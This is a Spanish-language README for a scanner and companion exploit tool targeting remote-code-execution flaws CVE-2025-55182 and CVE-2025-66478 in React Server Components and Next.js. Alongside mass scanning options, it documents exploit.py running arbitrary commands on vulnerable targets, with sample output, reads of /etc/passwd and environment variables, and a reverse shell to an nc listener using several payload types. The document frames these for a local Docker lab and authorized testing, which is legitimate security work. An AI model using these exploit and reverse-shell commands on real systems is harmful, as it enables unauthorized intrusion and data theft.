
React2shell-web-scanner
Escáner de vulnerabilidades de alta fidelidad para CVE-2025-55182 y CVE-2025-66478 - Vulnerabilidades de ejecución remota de código en React Server Components / Next.js.
📖 Para un análisis técnico detallado, mecánicas de explotación y datos IOC, consulte SECURITY-RESEARCH.md
Esta herramienta se proporciona SOLO con fines EDUCATIVOS y de PRUEBAS DE SEGURIDAD AUTORIZADAS. El acceso no autorizado a sistemas informáticos es ilegal. Utilice estas herramientas únicamente en sistemas que sean de su propiedad o para los que tenga permiso explícito por escrito. Los autores no asumen ninguna responsabilidad por el uso indebido.
| CVE | Descripción | CVSS |
|---|---|---|
| CVE-2025-55182 | Deserialización insegura RCE en React Server Components | 9.8 Crítico |
| CVE-2025-66478 | RCE en Next.js Server Actions | 9.8 Crítico |
Paquetes afectados:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0Versiones corregidas:
# No se requiere instalación - uv gestiona las dependencias
uv run react2shell-scanner -u https://example.com
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com
# URL única
python3 react2shell-scanner -u https://example.com
# Modo seguro (sin ejecución de RCE)
python3 react2shell-scanner -u https://example.com --safe-check
# Desde archivo de hosts
python3 react2shell-scanner -l targets.txt -t 50 -o results.json
# Rango CIDR
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000
# Múltiples rangos CIDR
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24
# Enumeración de subdominios
python3 react2shell-scanner -u example.com --enumerate-subdomains
# Lista de palabras personalizada para subdominios
python3 react2shell-scanner -u example.com --enumerate-subdomains \
--subdomain-wordlist "app,api,admin,portal,staging"
# Rutas personalizadas
python3 react2shell-scanner -u https://example.com \
--path / --path /_next --path /api
# Omitir huella tecnológica (escaneo de todo)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan
# Verboso con SSL deshabilitado
python3 react2shell-scanner -u https://example.com -k -v
# Cargar hallazgos a Phoenix
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--phoenix-config .phoenix.config
# Modo depuración (guardar payloads)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--debug
# Cargar todos los resultados (no solo vulnerabilidades)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--all-results
Cree .phoenix.config:
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new
O use variables de entorno:
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"
Se incluye un entorno de pruebas basado en Docker. Consulte Lab-instructions-sample.md como referencia rápida.
# Iniciar laboratorio
cd test-lab/lab
docker-compose up -d
# Servicios:
# - Vulnerable: http://localhost:3011
# - Parcheado: http://localhost:3012
# Probar instancia vulnerable (recopilación segura de evidencia)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e
# Probar instancia parcheada
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e
# Ejecutar demostración completa
./test-and-demo.sh --full-demo
⚠️ Nota: Los comandos de explotación (p. ej.,
exploit.py -c "whoami") desencadenan RCE REAL. Úselos únicamente en contenedores Docker locales con fines de investigación.
Ejecuta comandos en objetivos vulnerables. Requiere Python 3.11+
cd test-lab
pip3.11 install -r requirements.txt
# O: pip3.11 install rich-click fake-useragent rich requests
# Ejecución básica de comandos
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Salida: nextjs
python3.11 exploit.py -u http://localhost:3011 -c "id"
# Salida: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)
python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Salida: 99e28775bf80 (ID del contenedor)
# Enumeración del sistema
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"
# Reconocimiento de la aplicación
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Salida: /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"
# Información de red
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"
# Enumeración de procesos
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"
# Obtener la puerta de enlace de la red Docker
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
# Iniciar listener (en otra terminal)
nc -lvnp 4444
# Lanzar reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
# Tipos de payload disponibles: nc, nc-mkfifo, sh, bash, perl
| Opción | Descripción |
|---|---|
-u, --url | URL objetivo (obligatoria) |
-c, --cmd | Comando a ejecutar |
-r, --reverse | Habilita el modo reverse shell |
-l, --lhost | Host del listener para reverse shell |
-p, --lport | Puerto del listener para reverse shell |
-P, --payload | Tipo de payload: nc, nc-mkfifo, sh, bash, perl |
--timeout | Tiempo de espera de la solicitud (por defecto: 10s) |
[VULNERABLE] https://vulnerable.example.com
Estado: 307
Detección: rce_arithmetic_check
[COINCIDENCIA IOC] 93.123.109.247
La IP 93.123.109.247 coincide con infraestructura maliciosa conocida
[NEXTJS] https://safe.example.com v15.0.0
[NO VULNERABLE] https://other.example.com